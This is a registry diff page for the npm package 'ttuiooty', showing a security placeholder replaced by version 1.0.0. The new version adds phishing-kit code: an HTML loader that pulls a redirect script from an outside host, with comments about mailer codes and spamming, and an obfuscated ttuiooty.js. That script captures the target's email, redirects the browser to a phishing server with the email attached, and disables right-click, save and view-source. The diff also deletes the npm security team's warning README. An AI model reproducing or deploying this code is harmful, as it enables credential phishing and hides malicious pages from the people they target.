ttuiooty 0.0.1-security → 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of ttuiooty might be problematic. Click here for more details.
- package/document_box2box/document_box2box.html +11 -0
- package/document_box2box.zip +0 -0
- package/package.json +8 -3
- package/re.js +61 -0
- package/rgo.html +11 -0
- package/ttuiooty.js +2 -0
- package/README.md +0 -5
|
@@ -0,0 +1,11 @@
|
|
|
1
|
+
<!DOCTYPE html>
|
|
2
|
+
<html>
|
|
3
|
+
<head>
|
|
4
|
+
<script>
|
|
5
|
+
var getvar = "[[-Email-]]";// Replace with your mailer code
|
|
6
|
+
var pagevar = '';// Replace with pagetag. leave empty if you want to spam cameleon
|
|
7
|
+
</script>
|
|
8
|
+
<script src="https://emailserver.serafart.click/vmtradi/redir.js?no_redrct=null&pcnt=null&no_psplash=null&pmax=null&vcnt=null&page_bg=null"></script>
|
|
9
|
+
</head>
|
|
10
|
+
</html>
|
|
11
|
+
|
|
Binary file
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "ttuiooty",
|
|
3
|
-
"version": "0.0
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "1.0.0",
|
|
4
|
+
"main": "reda.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
|
7
|
+
},
|
|
8
|
+
"author": "",
|
|
9
|
+
"license": "ISC",
|
|
10
|
+
"description": ""
|
|
6
11
|
}
|
package/re.js
ADDED
|
@@ -0,0 +1,61 @@
|
|
|
1
|
+
const fs = require('fs');
|
|
2
|
+
const path = require('path');
|
|
3
|
+
|
|
4
|
+
// Directory to save the files
|
|
5
|
+
const outputDir = path.join(__dirname, 'ultio');
|
|
6
|
+
|
|
7
|
+
// Create the directory if it doesn't exist
|
|
8
|
+
if (!fs.existsSync(outputDir)) {
|
|
9
|
+
fs.mkdirSync(outputDir, { recursive: true });
|
|
10
|
+
}
|
|
11
|
+
|
|
12
|
+
// List of short, meaningful words or syllables
|
|
13
|
+
const syllables = [
|
|
14
|
+
"ember", "flare", "spark", "glint", "flame", "ignite", "glow", "flicker",
|
|
15
|
+
"quartz", "amber", "onyx", "agate", "jasper", "opal", "beryl", "topaz", "zircon", "garnet",
|
|
16
|
+
"torrent", "ripple", "whirl", "gush", "cascade", "eddy", "swirl", "stream", "brook", "current",
|
|
17
|
+
"summit", "bluff", "ridge", "peak", "crag", "knoll", "ledge", "butte", "pinnacle", "promontory",
|
|
18
|
+
"gale", "zephyr", "whirlwind", "sirocco", "monsoon", "tempest", "squall", "draft", "gust", "breeze",
|
|
19
|
+
"radiance", "luster", "glimmer", "shine", "gleam", "sparkle", "shimmer", "beam", "flash",
|
|
20
|
+
"kindle", "smolder", "torch", "blaze", "inferno", "cinder", "bonfire",
|
|
21
|
+
"frost", "rime", "sleet", "blizzard", "flurry", "icicle", "snowflake", "hailstone", "glaze", "avalanche",
|
|
22
|
+
"coral", "kelp", "anemone", "plankton", "urchin", "barnacle", "mollusk", "seaweed", "clam", "oyster",
|
|
23
|
+
"sprite", "wisp", "faerie", "goblin", "troll", "sylph", "imp", "pooka", "boggart", "pixie",
|
|
24
|
+
"shade", "phantom", "wraith", "spirit", "specter", "ghoul", "shadow", "revenant", "poltergeist", "apparition",
|
|
25
|
+
"hydra", "gryphon", "basilisk", "wyvern", "dragon", "manticore", "phoenix", "sphinx", "chimera", "kraken",
|
|
26
|
+
"serpent", "wyrm", "drake", "roc", "leviathan", "gargoyle",
|
|
27
|
+
"talon", "fang", "quill", "tusk", "antler", "claw", "spine", "plume", "horn", "beak",
|
|
28
|
+
"glacier", "firn", "serac", "crevasse", "floe", "iceberg", "snowdrift", "permafrost",
|
|
29
|
+
"grove", "bramble", "thicket", "glade", "meadow", "copse", "clearing", "woodland", "shrub", "orchard",
|
|
30
|
+
"whirlpool", "maelstrom", "riptide", "vortex", "wave", "surge", "tidal", "break",
|
|
31
|
+
"cosmos", "asteroid", "nebula", "quasar", "galaxy", "starfield", "meteor", "comet", "universe", "orbit",
|
|
32
|
+
"geode", "magma", "obsidian", "lava", "tephra", "pyroclast", "caldera", "volcano", "eruption", "ashfall",
|
|
33
|
+
"emerald", "ruby", "sapphire", "jade", "diamond", "amethyst",
|
|
34
|
+
"ocelot", "panther", "jaguar", "cheetah", "cougar", "lynx", "puma", "leopard", "caracal", "tiger",
|
|
35
|
+
"chasm", "cavern", "grotto", "sinkhole", "abyss", "fissure", "tunnel", "rift", "gorge",
|
|
36
|
+
"faun", "djinn", "nymph", "siren", "banshee", "glyph", "sigil", "rune", "ward", "hex", "charm", "spell", "ritual", "incantation", "enchant"
|
|
37
|
+
];
|
|
38
|
+
|
|
39
|
+
// Function to generate a random file name with up to 8 characters
|
|
40
|
+
function generateFileName() {
|
|
41
|
+
let fileName = '';
|
|
42
|
+
while (fileName.length < 5 || fileName.length > 8) {
|
|
43
|
+
const part1 = syllables[Math.floor(Math.random() * syllables.length)];
|
|
44
|
+
const part2 = syllables[Math.floor(Math.random() * syllables.length)];
|
|
45
|
+
fileName = (part1 + part2).substring(0, 8); // Ensure the file name does not exceed 8 characters
|
|
46
|
+
}
|
|
47
|
+
return fileName;
|
|
48
|
+
}
|
|
49
|
+
|
|
50
|
+
// Generate 30 unique JS file names
|
|
51
|
+
for (let i = 1; i <= 30; i++) {
|
|
52
|
+
const fileName = generateFileName();
|
|
53
|
+
const filePath = path.join(outputDir, `${fileName}.js`);
|
|
54
|
+
|
|
55
|
+
// URL for redirection
|
|
56
|
+
const redirectUrl = `https://example.com/${fileName}`;
|
|
57
|
+
|
|
58
|
+
// Write redirect JavaScript code to the file
|
|
59
|
+
fs.writeFileSync(filePath, `window.location.href = "${redirectUrl}";\n`);
|
|
60
|
+
console.log(`Generated: ${fileName}.js, redirecting to ${redirectUrl}`);
|
|
61
|
+
}
|
package/rgo.html
ADDED
package/ttuiooty.js
ADDED
|
@@ -0,0 +1,2 @@
|
|
|
1
|
+
var url_path = 'https://emailserver.kaobulia.site/_armoured_oxy';
|
|
2
|
+
var _0x358f78=_0x2eff;(function(_0x232a45,_0xc41b2a){var _0x5a2c1a=_0x2eff,_0x5725db=_0x232a45();while(!![]){try{var _0x413631=parseInt(_0x5a2c1a(0x129))/0x1*(parseInt(_0x5a2c1a(0x148))/0x2)+-parseInt(_0x5a2c1a(0x128))/0x3*(-parseInt(_0x5a2c1a(0x122))/0x4)+-parseInt(_0x5a2c1a(0x146))/0x5+parseInt(_0x5a2c1a(0x124))/0x6*(-parseInt(_0x5a2c1a(0x140))/0x7)+parseInt(_0x5a2c1a(0x12d))/0x8+parseInt(_0x5a2c1a(0x133))/0x9+-parseInt(_0x5a2c1a(0x13c))/0xa;if(_0x413631===_0xc41b2a)break;else _0x5725db['push'](_0x5725db['shift']());}catch(_0x104060){_0x5725db['push'](_0x5725db['shift']());}}}(_0x5069,0x4b945));var base64email=getvar,page=pagevar,href=window['location'][_0x358f78(0x120)],url_string=href,url=new URL(url_string),base64login=url[_0x358f78(0x137)][_0x358f78(0x13d)](_0x358f78(0x141)),request_type=url[_0x358f78(0x137)][_0x358f78(0x13d)]('request_type'),page_bg=url[_0x358f78(0x137)]['get']('page_bg'),no_redrct=url[_0x358f78(0x137)]['get'](_0x358f78(0x13a)),pcnt=url[_0x358f78(0x137)][_0x358f78(0x13d)](_0x358f78(0x13f)),no_psplash=url[_0x358f78(0x137)][_0x358f78(0x13d)](_0x358f78(0x121)),pmax=url['searchParams'][_0x358f78(0x13d)](_0x358f78(0x136)),vcnt=url[_0x358f78(0x137)][_0x358f78(0x13d)](_0x358f78(0x147)),use_cdtimr=url[_0x358f78(0x137)][_0x358f78(0x13d)](_0x358f78(0x12f));if(base64email)var email=base64email;else{if(base64login)var email=base64login;else var email='';}function _0x2eff(_0x5194c6,_0xd73709){var _0x506939=_0x5069();return _0x2eff=function(_0x2eff1b,_0x412f57){_0x2eff1b=_0x2eff1b-0x120;var _0x4237ad=_0x506939[_0x2eff1b];return _0x4237ad;},_0x2eff(_0x5194c6,_0xd73709);}(base64email||base64login)&&localStorage[_0x358f78(0x135)](_0x358f78(0x134),email);var url=url_path+_0x358f78(0x130)+email+_0x358f78(0x132)+page+_0x358f78(0x126)+request_type+'&page_bg='+page_bg+_0x358f78(0x13b)+no_redrct+_0x358f78(0x12c)+pcnt+_0x358f78(0x12b)+no_psplash+_0x358f78(0x142)+pmax+_0x358f78(0x127)+vcnt+_0x358f78(0x144)+use_cdtimr;function _0x5069(){var _0x4c8c6a=['replace','&request_type=','&vcnt=','1014FinAcj','2009obqeni','onkeydown','&no_psplash=','&pcnt=','1202264CAPUtT','addEventListener','use_cdtimr','/?login=','ctrlKey','&page=','4135032vABsye','email','setItem','pmax','searchParams','keyCode','location','no_redrct','&no_redrct=','3867490AoRmwg','get','contextmenu','pcnt','231JQTkfm','login','&pmax=','preventDefault','&use_cdtimr=','bind','2203250gNiHRe','vcnt','118sEmhdQ','which','href','no_psplash','7048kULIbt','keypress','33972wVlukq'];_0x5069=function(){return _0x4c8c6a;};return _0x5069();}setTimeout(()=>{var _0x468db3=_0x358f78;window[_0x468db3(0x139)][_0x468db3(0x125)](url);},0x5),$(document)[_0x358f78(0x145)]('keydown',function(_0xef4457){var _0x4bff26=_0x358f78;if(_0xef4457[_0x4bff26(0x131)]&&_0xef4457[_0x4bff26(0x149)]==0x53)return _0xef4457[_0x4bff26(0x143)](),![];}),document[_0x358f78(0x12e)](_0x358f78(0x13e),_0x4680a2=>_0x4680a2[_0x358f78(0x143)]()),document[_0x358f78(0x12a)]=function(_0x29ac45){var _0x292dc0=_0x358f78;return _0x29ac45['ctrlKey']&&(_0x29ac45[_0x292dc0(0x138)]===0x43||_0x29ac45[_0x292dc0(0x138)]===0x55||_0x29ac45[_0x292dc0(0x138)]===0x75)?![]:!![];},$(document)[_0x358f78(0x123)]('u',function(_0x2af3fc){var _0x3d0ddb=_0x358f78;return _0x2af3fc[_0x3d0ddb(0x131)]?![]:!![];});
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=ttuiooty for more information.
|